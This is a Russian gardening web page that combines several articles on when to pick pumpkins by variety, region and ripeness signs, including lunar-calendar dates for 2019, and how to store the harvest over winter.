2 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Когда снимать тыкву с грядки чтобы она сохранилась до весны

Когда снимать тыкву с грядки, чтобы она сохранилась до весны?

Тыква – это такой овощ, который растет на любом земельном участке. Этот плод выращивали еще в давние времена, и сейчас современные огородники не забывают о ее полезных свойствах. Тыквины содержат уйму витаминов, в которых нуждается любой человек. «Как употреблять тыкву в пищу?» – спросите вы. Из нее делают каши, соки и даже пироги. Она обладает сладким, но специфическим вкусом, поэтому не все ее так любят.

Тыква может лежать на поле до самых заморозков

Весь урожай необходимо снять осенью, до наступления первых заморозков. Данный овощ не исключение, но и здесь есть свои сроки, когда ее собирать. Уборка тыквы очень часто зависит от ее сорта. Поэтому целесообразно рассматривать виды данного продукта отдельно.

Когда созревает

Скороспелые сорта. Название тыквин «скороспелые» указывает на то, что они созревают быстро. Период их полного созревания: от 92 до 104 дней. Поэтому снять такие овощные растения советуют примерно в конце августа. Получить готовый овощ уже в августе – это шикарно и радостно, но в этом есть и минусы. Такие сорта хранятся не дольше месяца, поэтому их необходимо сразу же перерабатывать или закатывать, когда только сняли их.

Среднеспелые сорта. К этим видам относят:

  • Зимняя сладкая;
  • Блю Хаббард;
  • Волжская серая;
  • Лечебная;
  • Россиянка.

Данные сорта в отличие от предыдущих созревают за 120 дней, и могут храниться, что дает им много преимуществ. Собирают такой вид тыкв в сентябре, когда почти весь урожай уже лежит в ваших местах для хранения зимних запасов.

Поздние сорта. Среди них следует различать:

  • Жемчужина;
  • Тести Делайп;
  • Витаминная;
  • Батернат.

Данные тыквы созревают около двухсот дней. Собирать плоды советуют до наступления серьезных морозов, когда зимняя погода уже устоялась. Иногда и встречаются такие случаи, когда время срезать тыкву пришло, но она еще не совсем спелая. В таких случаях ее все равно собирают и кладут в темное, прохладное местечко. Там она дозреет за месяц. Тогда эти плоды можно перерабатывать, закатывать или замораживать.

Россиянка относится к среднеспелым сортам тыквы

Очень важно проследить за тем, чтобы на данных овощах не было повреждений, иначе они испортятся и не будут пригодны для эксплуатации.

Профессиональные дачники отмечают, что в южных краях тыквины не убирают довольно долго. Ее держат на грядках почти до полного высыхания ботвы.

Это объясняется тем, что морозы и холода в таких местах наступают поздно, поэтому тыкве не грозит промерзание и порча.

Так как же узнать, созрел овощ или нет, можно снимать его с гряды, или стоит немного подождать?

Чтобы разрешить этот вопрос, нужно выделить несколько признаков созревшего тыквенного продукта.

Признаки созревшей тыквы:

  • Ножки тыквин будут максимально сухими, жесткими и твердыми. Естественно, они не будут зеленого цвета. Зеленая плодоножка – это один из признаков того, что тыква еще зреет, и ее ни в коем случае нельзя срезать.
  • Листья сухие, желтые и бледные.
  • Данный созревший овощ имеет яркий цвет.
  • Кожица у него весьма твердая и жесткая.

Засохший хвостик тыквы сигнализирует о ее спелости

Как правильно срезать тыкву и хранить

Когда срезаете растение, лучше оставлять сантиметра четыре плодоножки. Делать это предельно аккуратно, потому что любое повреждение, а особенно порез кожуры, плохо будет влиять на хранение данного продукта.

Давайте разберем пошагово, как собирать горлянку (так называют тыкву в простонародье):

  • Первое, что делает опытный огородник, это проходит по всем грядам и осматривает весь урожай на предмет созревания. Потому что тыкву снимают сразу всю, а не оставляют несколько недозревших на грядках.
  • После этого необходимо запастись хорошим острым ножом или садовыми ножницами. Профессионалы в этом деле советуют использовать ножницы, потому что это гораздо удобнее. Использовав их, сложно нанести значительные повреждения кожуре.
  • Следом подготовить место хранения урожая. Выбрав подходящее местечко, можно положить на пол старые одеяла или солому, так она не испортиться и не загниет.
  • Потом аккуратно срезать все плоды и перенести в место хранения. При срезании этого растения важно помнить о том, что необходимо оставлять четыре сантиметра плодоножки.

Зрелую тыкву можно сразу эксплуатировать для еды, после сбора урожая, но многие оставляют овощ для хранения. Тем более что плодов выходит довольно большое количество. Поэтому ни одной семье не под силу скушать большое количество горлянки.

Ее часто хранят в прохладном месте, в подполе или же в кладовке, на чердаке, гараже, сарае или кладовке.

Кроме прохлады, также учитывать влажность воздуха данного помещения при хранении. Потому что повышенная влажность воздуха сокращает срок хранения плода тыквы на целых три месяца. А это довольно значительное время.

Таким образом, мы выяснили, что тыквины могут снимать с конца августа и до октября, в зависимости от сорта и климата. Также мы продемонстрировали то, каким образом правильно и грамотно снять тыквины с грядок.

Собираем урожай вовремя: когда убирать тыкву и как определить её спелость на грядке

Сбор урожая тыквы — самый приятный процесс для огородника. А если плоды уродились, то вдвойне. Тыкву любят за богатое содержание витаминов и микроэлементов, но из-за ошибок овощеводов теряется ее польза. Если передержать тыкву на грядке, она может подмерзнуть. От срока сбора овоща во многом зависят его вкусовые качества и срок хранения.

Как понять, что тыква созрела? По каким сортовым и индивидуальным признакам определить зрелость? Когда снимать урожай по лунному календарю? Подробные ответы на эти вопросы вы найдете в нашей статье.

Когда убирать тыкву

Среднеспелый сорт тыквы созревает около 4 месяцев. Убирают урожай в середине сентября. Обязательное условие — успеть срезать все плоды до наступления заморозков. В противном случае тыква быстро замерзнет и испортится.

Урожай собирают в сухой погожий день. Если снятие плодов выпало на дождливый период, плоды высушивают и оставляют на несколько суток в сухом темном месте.

От чего зависят сроки созревания

Есть скороспелые, среднеспелые и позднеспелые сорта. Каждый из них отличается скоростью и условиями созревания.

Климат играет ключевую роль в плодоношении растений:

  • в южных регионах на открытом грунте принято собирать урожай, когда иссохнут все листочки;
  • в северных областях плоды не успевают поспеть, их снимают раньше времени и отправляют дозревать в помещении.

Как понять, что тыква созрела и её пора убирать

Как определить спелость овоща на грядке? Для начинающих огородников особенно важно знать признаки готовности плодов к употреблению или хранению. Руководствуйтесь внешними проявлениями. Не нарушайте целостность плода и не пытайтесь его проткнуть или разрезать, иначе он быстро испортится.

Важно! Снимать овощи можно только при помощи ножа, аккуратно отрезая его от плодоножки. Не срывайте тыкву и не оставляйте на хвостике рваных концов — это вызовет болезненность плода и растения.

Индивидуальные признаки созревания плодов

Проверить спелость тыквы можно, не убирая ее с грядки. В зависимости от сорта каждое растение по-разному сигнализирует о зрелости плодов. Достаточно присмотреться к коре овоща:

  • кустовые сорта отличаются четкими светло-желтыми полосками;
  • у крупноплодной тыквы видна темная густая сетка;
  • кора мускатных сортов приобретает бурый цвет со светлыми круглыми пятнами.

Внешние проявления

Внешние критерии зрелости тыквы:

  1. Плодоножка высохшая, твердая, жесткая. Если она все еще зеленая, стоит дать ей дозреть.
  2. Листья и плети на растении пожелтевшие и высохшие (хотя бы частично).
  3. Тыква имеет насыщенный цвет в зависимости от ее сорта — желтый, серо-зеленый или темно-оранжевый. Есть некоторые сорта, на которые это правило не распространяется. Существуют растения, чьи плоды остаются белыми или серыми и при полноценном созревании.
  4. Корка плода жесткая и плотная. При надавливании на нее не должно оставаться вмятин.
  5. Оболочка спелых плодов имеет ярко выраженный рисунок. Исключение составляют зеленоплодные сорта.
  6. Плотная структура мякоти.
  7. Твердая кожура семян, за исключением голосемянных сортов.

Справка. Некоторые огородники рекомендуют ориентироваться на звук при постукивании. Если он звонкий, тыква созрела.

Обладая этими нехитрыми знаниями, вы без труда узнаете время уборки урожая на своем огороде. Где бы он ни находился, на Кубани, в Сибири, в Ленинградской, Московской областях или на Урале — эти критерии универсальны.

Убирайте только созревшие плоды. Если вам все-таки необходимо провести сбор раньше времени, оставьте их дозревать в теплом сухом месте.

Для удобства огородников производители пишут сроки снятия урожая на обратной стороне пакетика с семенами. Иногда в описании указывается цвет созревшего плода.

Важно! Срок, указываемый производителями, будет точен, только если лето выдалось теплым и солнечным.

Календарные сроки сбора урожая

Календарные сроки уборки тыквы зависят от местного климата и сорта растения:

  • в Сибири урожай снимают с конца августа;
  • в средней полосе России и на Украине — в середине сентября;
  • в Краснодарском крае — до начала октября.

Тыкву нужно собирать в ясный сухой день. Желательно, если он совпадет с датой сбора по лунному календарю.

Уборка по лунному календарю

Опытные огородники проводят все работы на участке, согласно лунному календарю. Оказывается, даже уборка урожая имеет свои благоприятные дни — в этот период все соки растения движутся к плоду, насыщая его и придавая вкус.

Каждый год график лунного календаря изменяется. Наиболее благоприятными датами для сбора тыкв будут дни, когда Луна находится в Близнецах в убывающей фазе, Скорпионе — в растущей, Стрельце, Козероге и Водолее — в любой.

Сорта тыквы и сроки созревания

Сортов тыквы — множество, но есть универсальные сроки сбора урожая:

  • Скороспелые — Мозолеевская 49, Голосемянная, Миндальная 35, Бирючекутская 27, Веснушка и др. Они поспевают в течение 3,5 месяцев, а убирают их в середине — конце августа. Плоды довольно нежные, имеют тонкую корку, поэтому хранятся не больше месяца. Скороспелые сорта чаще выращивают в холодных регионах: в случае подморожения они долго не хранятся.
  • Среднеспелые — Улыбка, Зимняя сладкая, Крошка, Волжская серая, Стофунтовая, Лечебная, Россиянка и др. Срок созревания — 4 месяца. Тыкву снимают в середине сентября до появления первых заморозков.
  • Позднеспелые (твердокорые) — Мускатная, Жемчужина, Вита, Тести Делайп, Перехватка, Витаминная и Батернат Понка. Хранятся до полугода за счет толстой корки. Сборы проводят в середине — конце сентября. Срок созревания — около 200 дней, поэтому тыква доспевает при хранении.

Хранение собранного урожая

Прежде чем оставить собранный урожай на хранение, желательно рассортировать тыквы по объему на крупные, средние и мелкие. Опытные дачники советуют оставлять плоды только средних и крупных размеров, без повреждений.

Как узнать, не сгниет ли тыква во время хранения? Если соблюдать определенные условия, она останется свежей всю зиму. При температуре в 25-28°C и влажности в 80-85% недозревшие тыквы дозреют, кожица затвердеет, а царапины, которые могут стать причиной гниения, заживут. Если вы все-таки увидели повреждения, попытайтесь их излечить, обработав 3%-ной марганцовкой.

Спустя неделю тыкву желательно перенести в сухое прохладное место, желательно с хорошей вентиляцией. Благоприятные условия для хранения на оставшееся время — температура +4…+9°C и влажность — 70%.

Владельцы частных домов могут использовать для закладки урожая погреба, жители мегаполисов приспособились хранить овощи на балконе или в подвале.

Помимо этого, есть еще несколько рекомендаций, которые помогут вам сохранить урожай на зиму:

  • расставляйте тыквы так, чтобы между ними циркулировал воздух;
  • хранить тыковки удобнее всего на стеллажах, подложив под них солому;
  • присматривая за хранилищем 2 раза в неделю, вы сможете сразу заметить гниющие плоды и защитить остальные;
  • не храните тыкву рядом с фруктами.

Справка. Огородники отмечают лучшую сохранность у таких сортов как Миндальная 35, Мозолеевская 49, Премьера и Грибовская зимняя.

Советы опытных огородников

Выращивание тыквы имеет свои хитрости:

  1. Последний раз поливать овощ следует за 3 недели до сбора урожая.
  2. В редких случаях можно проверить спелость тыквы, надавив на нее ногтем. Если кожура продавилась и внутри зелено, то она не дозрела. Но такая проверка чревата гниением всего плода.
  3. Если места для хранения овощей не достаточно, можно нарезать тыкву кусочками и заморозить. Такую заготовку используют для приготовления всех блюд, кроме тыквенного сока. Также популярно вяление и сушение овощей.
  4. Тыкву не стоит держать до весны. В этом случае она начинает залеживаться и становиться «ватной», теряя свой вкус и сочность.
  5. Если сезон был холодным и дождливым, время уборки урожая пришло, а тыква еще не дозрела, можно ускорить этот процесс. За 3 недели до первых заморозков все цветы с тыквы нужно снять, а верхушки молодых побегов прищипнуть. Чтобы ускорить созревание крупных плодов, все мелкие тыковки удаляют с куста.

Заключение

Тыква — культура неприхотливая, она растет на большинстве дач и огородов России. Не требуется больших усилий, чтобы ее вырастить. Но знать хотя бы основы по уходу за овощем необходимо. Определение зрелости плода — несложное занятие. Достаточно знать сортовые особенности тыквы и присмотреться поближе к растению и самому овощу.

Важно убрать урожай до наступления заморозков, иначе плоды промерзнут. Следуйте нашим полезным рекомендациям и получайте хорошие урожаи каждый год!

Когда убирать тыкву с грядки на хранение

Одним из главных достоинств тыквы является ее способность к длительному хранению. Овощ может лежать до следующего лета, без изменений вкуса и потери витаминов. Но для такого длительного хранения тыкву нужно вовремя убрать с грядки. Она должна быть полностью созревшей, но не переспелой, без признаков болезней и повреждений на кожуре.

Как определить, что тыква созрела и готова к уборке

Выращивая сортовые растения, огородник знает, что существуют ранние, среднеспелые и поздние сорта тыквы. В зависимости от срока вегетации проводят уборку овоща. Если посев проводят «своими» семенами, не зная точно сортовой принадлежности растения, можно ориентироваться на внешние признаки спелости: изменение окраски кожуры, плодоножку.

По сортовой принадлежности

Как правило, на участке выращивают несколько сортов тыквы, подбирая их таким образом, чтобы лакомиться витаминным овощем круглый год.
  1. Ранняя или скороспелаятыква готова к употреблению через 90-95 дней после посева. Ранние сорта характеризуются тонкой кожурой, сладкой и сочной мякотью, которую можно употреблять в свежем виде. Плоды скороспелой тыквы, как правило, небольшие. Растение имеет кустовую форму. Хранить такую тыкву дольше 4 месяцев не рекомендуется.

Совет. В регионах с коротким летом рекомендуется выращивать ранние и среднеспелые сорта тыквы, чтобы те успели вызреть.

Лучшими сортами ранней тыквы считаются: Улыбка, Плюшка, Миндальная, Россиянка, Лечебная, Славянка.

  1. Среднеспелая тыква готова к уборке через 4-4,5 месяца после посева. Тыквины на растении вызревают довольно крупные. Они хорошо хранятся на протяжении 6-9 месяцев. К этой категории относятся: Голосемянная, Мускатная, Желтый центнер, Волжская серая, Мадам, Крошка.
  2. Позднеспелой тыкве для созревания потребуется провести на грядке не менее 5 месяцев. Такие сорта редко выращивают севернее средней полосы, хотя позднюю тыкву не сложно вырастить через рассаду. Урожай поздней тыквы можно хранить более года. Хорошая сохранность плодов гарантируется твердой кожурой и высоким содержанием сухого вещества в мякоти. Сорта: Грибовская зимняя, Мускат Прованса, Зимняя сладкая.

Несмотря на более или менее известные сроки уборки сортовой тыквы, не следует слепо им следовать, убирая овощ строго по календарю. На сроки созревания влияет погода, агротехника, свойства почвы. Важным признаком готовности тыквины к сбору является ее внешний вид.

По внешним признакам

Главные признаки, указывающие на спелость овоща – состояние кожуры и плодоножки.

У спелой тыквины кожура приобретает свойственный сорту цвет – желтый, серый, оранжевый. У зеленокорых сортов цвет становится темным, насыщенным. Кожица становится твердой, она не только не проминается от нажатия пальцем, но ее невозможно покарябать ногтем.

На заметку. Чем толще кожура, тем дольше хранится тыква. Самые твердокорые – поздние тыквы.

Плодоножка вызревшей тыквы полностью высыхает, становится сероватой или желтой, твердой (деревянистой) наощупь. Зеленая и мягковатая плодоножка – признак незрелости плода.

К второстепенным признакам спелости тыквы можно отнести пожелтение и увядание листвы.

Если спелую тыкву разрезать, ее мякоть будет иметь насыщенный цвет и издавать характерный аромат. Семечки (за исключением голосемянной разновидности) покрыты плотной кожурой, полновесные.

Когда собирать урожай тыквы в регионах

На сроки вызревания овоща заметно влияет климат региона, где он выращивается, и погода в период вегетации. Так, в дождливое и прохладное лето вызревание тыквы может так затянуться, что огородник вынужден снимать неспелые плоды, чтобы те не уничтожил заморозок. Прелесть тыквы заключается в способности постепенно дозревать в теплом и сухом помещении.

В Подмосковье

Месяц сбора тыквы в Подмосковье и граничащих областях – сентябрь. В зависимости от сорта, урожай снимают с начала по конец месяца, стараясь успеть до заморозков. Впрочем, похолодание до -2 градусов тыква переносит стойко, это никак не сказывается на длительности хранения.

Важно! Лучше провести уборку тыквы в сухой период. Если прогноз обещает затяжные дожди, лучше собрать урожай немного раньше, но в благоприятную погоду .

В Сибири и на Урале

Суровый край диктует свои условия для ведения сельского хозяйства. Тыкву в условиях короткого лета сажают через рассаду, выбирая скороспелые и среднеспелые сорта. Урожай следует собрать в конце августа – начале сентября.

В Средней полосе России

Урожай в регионе поспевает в сентябре. Если осень стоит теплая и сухая, можно оставить плоды основательно прогреться до первой декады октября.

Когда убирать тыкву с грядки с 2019 году по лунному календарю

Считается, что тыквы, убранные с грядки в сроки согласованные с Лунным календарем, лежат на хранении лучше.

В 2019 году благоприятными днями для уборки будут:

  • сентябрь – 11, 12, 20, 23, 24, 29, 30;
  • октябрь — 2, 3, 4, 7, 8, 9.

Не рекомендуется собирать урожай для хранения 14, 15, 16, 26 сентября и 14 октября.

Правила уборки тыквы

Для сбора плодов выбирают сухой и солнечный день. Необходимо заранее приготовить инструмент, которым предполагается срезать тыквины с плетей. Просто отрывая тыкву от стебля, можно обломать плодоножку близко к кожуре и такая тыква будет плохо храниться. Обычно используют небольшую ножовку или сучкорез.
  1. Тыквину срезают с плети, оставляя черешок, длиной 4-6 см. Если плод оказался не совсем спелым, и на срезе плодоножки выступило много сока, срез присыпают золой.
  2. Плоды укладывают в один слой подсохнуть на солнце, черешками вверх. Если погода дождливая, плоды переносят под навес и все равно дают им обсохнуть несколько часов на ветерке.

Важно! Переносить тыкву, взяв за плодоножку, нельзя! Она может оторваться и на плоде образуется рана.

  1. Просохшие тыквы сортируют, отбирая для хранения экземпляры среднего и крупного размера, с ярко выраженными признаками спелости, с не поврежденной кожицей.

Перевозя тыквы с огорода до мест хранения, важно обращаться с плодами бережно. Не допускается кидать и ронять тыкву. На ушибленных участках в процессе хранения развивается гниль.

Как сохранить урожай тыквы зимой

Даже полностью созревшая тыква, убранная в благоприятную погоду, может сгнить, если нарушены правила хранения. Для овоща подбирают хранилище, где поддерживается положительная температура и определенная влажность.

Общие правила хранения

Сразу после уборки, тыквы хранят около недели в тепле, при температуре +22 +25 градусов и влажности 70-75%. В таких условиях подсыхают все царапины на кожице, опробковеет срез на плодоножке.

На постоянное хранение плоды убирают в более прохладное помещение, с температурой +8 градусов и влажностью не выше 70%. Это может быть кладовка, погреб или подвал.

С какими овощами (фруктами) тыквы не рекомендуется хранить

Тыкву нельзя размещать в одном помещении с плодами, выделяющими этилен. Это газ, который провоцирует ускоренное созревание, вызывая преждевременную порчу овоща. Тыкву не желательно хранить в одном помещении с такими культурами: яблоки, груша, айва, абрикос, дыня, свежие томаты, картофель.

Можно хранить тыкву по соседству с корнеплодами (морковью, свеклой).

Способы хранения тыквы в квартире, в погребе

Тыквины в погребе располагают так, чтобы они не соприкасались кожицей друг с другом. Обычно плоды кладут на деревянные полки, соблюдая расстояние между тыквинами в 7-10 см.

Если плодов много и их нужно сложить компактно, между ними прокладывают плотную бумагу (несколько слоев газеты). Друг на друга тыквы можно укладывать, но не более 3 слоев. На землю или бетонный пол овощ не кладут, используют деревянные решетки или листы фанеры.

Совет . Вместо бумаги для прослаивания можно использовать крупную древесную стружку, хорошо просушенную солому.

В условиях городской квартиры приходится держать урожай при более высокой температуре, чем рекомендовано. Плоды можно хранить при +18 +20 градусов несколько месяцев без ущерба для качества.

Тыкву кладут в картонные или деревянные ящики, перекладывая бумагой, картоном или пересыпая опилками. Ящики ставят в самое прохладное место в квартире (кладовка, коридор), но так, чтобы на овощ не попадал ледяной воздух (например, из балконной двери). Вблизи батарей отопления урожай не размещают, чтобы он не испортился.

Если урожай велик, и весь его разместить в квартире не удается, часть плодов пускают в переработку. Тыкву можно:

  • сушить, нарезать на тонкие пластины и избавив от кожуры;
  • замораживать;
  • перерабатывать в варенье, сок.

Сорта тыквы, которые лучше всего хранятся

Как сказано выше, лучшими для хранения, считаются позднеспелые или среднеспелые твердокорые сорта. За счет плотной оболочки и малосочной мякоти, такая тыква меньше подвержена гниению и легче переносит неблагоприятное воздействие окружающей среды.

По отзывам опытных огородников среди долго хранящихся тыкв лидируют такие сорта:

  • Грибовская зимняя;
  • Волжская серая;
  • Жемчужина;
  • Зимняя сладкая;
  • Крошка;
  • Восковая (Бенинказа).

Указанная тыква может лежать, без потери качества, до 1,5 лет. Но и другие, даже ранние сорта тыквы успешно хранятся в подходящих условиях на протяжении 2-4 месяцев.

Полезное видео

Уборка тыквы, хранение– запасаем урожай на зиму — видео

Тыквы — сбор урожая, обзор сортов — видео

Тыква относится к неприхотливым в выращивании и хранении овощам. Ее свежая вкусная мякоть естественный поставщик организму каротина и других витаминов в зимний период.

Когда убирать тыкву, чтобы она долго хранилась

Тыква весьма полезна, хотя и не все её очень любят. Она довольно неприхотлива, в большинстве регионов вырастить её несложно. Но чтобы тыква долго хранилась, её надо правильно и вовремя убрать. Эта культура очень боится морозов, поэтому запаздывать со сбором урожая недопустимо.

Как определить, что тыкву пора убирать на хранение

Слишком рано снятая тыква, которой ещё далеко до полной зрелости, долго храниться не способна. Однако и попавшие под заморозки плоды пригодны только для переработки. А поскольку большинство сортов тыквы требует для полного созревания солидного количества времени, сбор урожая приходится на осень. В это время уже надо внимательно следить за погодой, чтобы не остаться без хорошо и долго лежащих витаминных плодов.

Все сорта тыкв делят на три группы: крупноплодная, твёрдокорая и мускатная. К сожалению, самая вкусная из них — мускатная — требует много времени для пребывания на грядках и далеко не во всех регионах может выращиваться. В принципе, независимо от сорта, определить, что тыква созрела, очень просто. Легко увидеть, дорос ли плод до нормального размера и окрасился ли в цвет, характерный для конкретного сорта. Почти всегда это уже достаточные признаки для того, чтобы снимать урожай.

Мускатная тыква самая вкусная

Не для всех сортов окраска плода свидетельствует о готовности его к уборке. Так, тыква Волжская серая имеет серую окраску с самого начала формирования плода и до его уборки, а Россиянка — оранжевую.

Надёжный признак готовности тыквы к уборке — состояние плодоножки. По мере созревания плода она становится серой и подсыхает. В это время и стоит убирать плоды на хранение. Впрочем, этот признак хорош в основном для твёрдокорой тыквы. Для крупноплодной и мускатной достаточным признаком часто является сформировавшийся рисунок на тыквине. При сборе урожая аккуратно отрезают плодоножку с помощью секатора, оставляя на тыквине её фрагмент длиной хотя бы 5–6 см.

У полностью созревших тыкв плодоножки почти сухие

Тыква, снятая без плодоножки, пролежит не больше полутора месяцев!

Если плод грязный, его аккуратно обтирают и немного подсушивают. Хранить тыквы можно и в погребе, но обычно этого не требуется: спелые плоды прекрасно лежат в квартире. Можно ли брать для хранения недозревшие экземпляры? Как правило, можно, если они уже доросли до нормального размера и их окраска начала меняться. Такие плоды в течение месяца или двух прекрасно дозревают при комнатной температуре, чем успешно пользуются при выращивании позднеспелых сортов. Вот только снимать недозревшие экземпляры надо особенно бережно, нельзя повреждать их кожуру даже в минимальной степени. Да и семечки, в отличие от мякоти, при хранении дозревают далеко не всегда.

Многие огородники играют «на грани»: снимают плоды после первых слабых заморозков. Если столбик термометра слегка перевалил через 0 оС, листья погибнут, а тыквина останется цела. Но ведь столбик может уйти и далеко…

Если тыква покрылась инеем, путь её — в переработку

Примерные сроки уборки тыквы на юге России, в Подмосковье, на Урале и других регионах

Раннеспелые сорта тыкв вызревают повсеместно, проблем с их уборкой нет, поскольку с момента появления всходов до полной зрелости проходит 3–4 месяца. Правда, такие сорта не всегда самые вкусные и долго хранящиеся. Поэтому для зимнего хранения лучше выбирать среднеспелые, требующие до 130 дней, и поздние (до 160). Такие тыквы вызревают не в любой местности.

Лишь на юге (на Ставрополье, в Краснодарском крае, Северном Кавказе, в Крыму и др.) не следует задумываться о том, чтобы тыквы полностью созрели. Здесь время уборки выбирают, скорее, из возможностей огородника. Если плодам требуется побыть на грядке до середины октября, для этого вполне есть время. Заморозки урожаю не угрожают, поэтому часто ждут, пока не высохнут листья и стебли.

На юге можно ждать, пока от листьев ничего не останется

В средней полосе России и, в частности, в Подмосковье вполне подходящий климат для выращивания большинства сортов тыквы, бывают проблемы только с мускатными. Скороспелые сорта снимают в середине августа, а к середине сентября приходит пора среднеспелых сортов. Позднеспелые же — на грани риска: их надо подержать хотя бы до конца сентября, но чаще всего для этого погода не предоставляет возможности, и такие тыквы приходится снимать недозрелыми под самые заморозки. В самые благоприятные годы можно подождать до начала октября.

Ленинградскую область иногда относят к средней полосе, но это не совсем верно: всё-таки на северо-западе страны климат более суров. Тем не менее сроки уборки тыквы здесь мало отличаются от подмосковных и определяются текущей погодой (год на год не приходится).

Климат на Урале разнообразный: в одних областях, как и в средней полосе и Поволжье, весьма благоприятный для выращивания тыквы, в других — слишком суровый. В проблемных местностях часто бывают очень холодные сентябрьские ночи с тёплыми днями. Такие перепады вызывают появление конденсата на плодах, приводящего к их преждевременной порче. Поэтому, бывает, убирать урожай приходится уже в начале сентября.

Сложно определить даты сбора урожая также и в Сибири и на Дальнем Востоке, настолько непредсказуемой бывает погода. В связи с этим поздние сорта здесь не сажают вовсе. Ранние успевают быть убранными до конца лета, а среднеспелые тыквы могут созреть (если погода позволит им полежать на грядке до середины или даже конца сентября) или не успеть (ведь иногда и их приходятся снимать в конце августа).

Видео: уборка урожая тыквы

Чтобы тыквы хранились долго, их надо убрать созревшими или почти созревшими. Конкретные сроки уборки урожая зависят от погоды: плодам ни в коем случае не следует попадать под заморозки.

Когда убирать тыкву с грядки в 2019 году

Достоинства тыквы совместно с хорошей урожайностью и не завышенными требованиями к условиям выращивания и ухода снискали ей заслуженную популярность среди садоводов и огородников. Сегодня мы расскажем, когда убирать тыкву с грядки и как правильно это делать.

Известная на Руси с 16 века тыква, а также блюда из нее, остаются популярными в рационе питания и по сегодняшний день. Это объясняется значительным содержанием в них полезных веществ, таких как разнообразные микро – и макроэлементы, витамины различных групп, в том числе очень редких К и Т, клетчатки, не вызывающей газообразования в кишечнике и др.

Когда убирать тыкву

В зависимости от времени и условий посадки (семенами или рассадой), вегетативного срока развития конкретного сорта растения и погодных характеристик сезона определяется оптимальный период когда необходимо убирать тыкву на хранение. Для этого необходимо учитывать следующее:

  • выдерживание вегетативного срока роста растений, заявленного производителем семенного материала;
  • признаки спелости тыквы;
  • прогнозные данными об изменении погоды в конце сельскохозяйственного сезона;
  • наличие в уборочный период сухих дней, желательно благоприятных для сбора урожая по Лунному календарю.

Рассмотрим эти условия подробней.

Вегетативный срок развития растения

Очень желательно выдерживать заявленный разработчиком (производителем, поставщиком) семенного материала вегетативный срок развития растения. Только в этом случае (при соблюдении правил ухода) можно уверенно рассчитывать на получение декларируемых характеристик сорта по размерам плода, его сахаристости, стойкости к хранению и пр.

Преждевременный сбор плодов может быть оправдан только в случае опасения наступления заморозков и гибели урожая.

Поэтому в тех регионах, где существует высокая вероятность ранних заморозков (Средний Урал, Сибирь) и короткое лето, лучше останавливать свой выбор на раннеспелых сортах культуры или выращивать её более поздние сорта рассадным способом.

Признаки спелости тыквы

В зависимости от летних погодных условий (невысокой температуры, малого количества солнечных дней и пр.) созревание тыквы может отклониться от заявленных производителем семян сроков. Для дополнительного подтверждения спелости растения используются следующие признаки:

  • Одеревенение плодоножки – превращение её из зеленой и сочной в очень твёрдую и сухую;
  • Поблекшие и пожелтевшие листья, частично даже засохшие;
  • Изменение цвета тыквы на более яркий и насыщенный;
  • Повышение твердости оболочки.

Данные прогноза погоды

В зависимости от прогнозных данных созревшую тыкву рекомендуется:

  • При ожидании заморозков – немедленно убирать;
  • При ожидании длительной дождливой погоды – не откладывать уборку. Избыточная влага ухудшит качество плода и его способность к лёжкости;
  • При ожидании сухой погоды – в этом случае тыкву лучше пока не убирать. Она сможет дополнительно окрепнуть и пополниться полезными веществами.

Лунный календарь 2019

Убирать тыкву нужно в ясный и сухой день. Желательно, чтобы он совпал с благоприятными датами согласно Лунного календаря. По этому календарю наиболее подходящими днями для уборки тыквы будут даты, когда Луна находится в Близнецах (при убывающей фазе), Скорпионе (при растущей фазе) и при любой фазе в Стрельце, Козероге и Водолее.

В 2019 году это соответствует следующим дням, когда убирать тыкву с огорода:

  • 6, 7, 16…25 августа,
  • 2…4, 13…22, 30 сентября,
  • 1, 11…19, 27, 28 октября.

Правила уборки и хранения

Созревшую тыкву срезают обязательно с плодоножкой, в противном случае она будет плохо переносить хранение. Из-за хрупкости плодоножки не рекомендуется использовать её при переноски плода.

Созревшие плоды зимних сортов тыквы, которые намечены на длительное хранение, желательно подсушить и прогреть на солнце в течение 8…10 дней. При этом их кора быстрее затвердеет и будет лучше сохранять внутреннюю мякоть плода. Если оболочка получила повреждение (царапины), то они быстро заживут если применить зелёнку.

Как и при какой температуре лучше хранить тыкву?

Даже в условиях городской квартиры можно обеспечить надежное хранение спелого плода в точение полугода и более. Для этого нужно выбрать самое прохладное и затемненное место, вдали от нагревательных приборов. При наличии погреба эта задача еще более упрощается.

Следует отметить, что здесь речь идет о хранении зимних сортов тыквы. Другие сорта способны только на кратковременную (до двух месяцев) лёжку. Однако если поставлена цель создание запасов плодов до весны, то поздние (зимние) сорта тыквы можно вырастить практически в любом регионе (Сибири, Урале, Ленинградской области, Подмосковье, Беларуси, средней полосе России и во всех более южных широтах).

Для этого практикуется рассадный способ и уборка неспелых плодов с последующим их дозреванием в комнатных условиях. Последнее, на наш взгляд, несколько снижает качество тыкв, но многие садоводы считают это вполне допустимым.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
